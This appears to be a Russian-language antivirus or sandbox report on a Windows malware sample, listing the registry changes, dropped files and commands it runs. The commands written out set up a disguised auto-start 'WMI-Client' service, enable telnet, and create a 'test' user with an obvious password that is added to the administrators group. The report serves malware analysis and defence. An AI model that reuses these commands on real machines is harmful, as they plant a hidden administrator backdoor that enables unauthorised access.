Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\WMI-Client] 'Start' = '00000002'
- <SYSTEM32>\svchost.exe /service
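- <SYSTEM32>\sc.exe create "WMI-Client" binpath= "<SYSTEM32>\svchost.exe " start= auto (служба с автозапуском; штатные службы Windows запускают svchost.exe с параметром -k, здесь его нет, а процесс выше запущен с ключом /service)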
- %WINDIR%\regedit.exe /s 0.reg
- <SYSTEM32>\sc.exe description WMI-Client "Microsoft WMI-Client"
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\sc.exe start WMI-Client
- <SYSTEM32>\net1.exe localgroup TelnetClients /add
- <SYSTEM32>\cmd.exe /c """%TEMP%\1.tmp\test-test-31337.bat"""
- <SYSTEM32>\net1.exe user test test /add
- <SYSTEM32>\net1.exe localgroup TelnetClients test /add
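- <SYSTEM32>\net1.exe localgroup %USERNAME%en test /add (по-видимому, имя группы — «Administratoren»: при обезличивании отчёта подстрока «Administrator» заменена на %USERNAME%; то есть учётная запись test добавляется в локальную группу администраторов)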
- %TEMP%\1.tmp\test-test-31337.bat
- <SYSTEM32>\0.reg
- <SYSTEM32>\svchost.exe
- %TEMP%\1.tmp\b2e
- %TEMP%\1.tmp\b2e.dll
- %TEMP%\1.tmp\binaries.txt
- %TEMP%\1.tmp\test-test-31337.bat
- %TEMP%\1.tmp\b2e.dll
- <SYSTEM32>\0.reg
- %TEMP%\1.tmp\binaries.txt
- %TEMP%\1.tmp\b2e
- ClassName: 'RegEdit_RegEdit' WindowName: ''